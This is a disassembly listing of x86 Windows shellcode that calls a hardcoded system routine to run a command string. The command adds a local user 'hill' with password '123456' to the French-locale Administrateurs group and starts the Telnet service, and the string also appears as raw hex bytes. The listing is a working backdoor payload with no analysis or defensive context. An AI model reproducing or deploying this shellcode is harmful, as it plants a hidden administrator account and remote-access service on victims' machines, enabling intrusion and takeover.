0x0        jmp 0xa                             \xeb\x08                  ..        

     label_0x2:
0x2        mov edx, 0x7c86114d                 \xba\x4d\x11\x86\x7c      .M..|     
0x7        call edx                            \xff\xd2                  ..        
0x9        int3                                \xcc                      .         
     label_0xa:
0xa        call 2                              \xe8\xf3\xff\xff\xff      .....     
0xf        cmd /c net user hill 123456 /ADD && net localgroup Administrateurs hill /ADD && sc start TlntSvr ; string\x63\x6d\x64\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6c\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73\x20\x68\x69\x6c\x6c\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61\x72\x74\x20\x54\x6c\x6e\x74\x53\x76\x72          
0x6f       db 0x00 (!)                        \x00                      .         
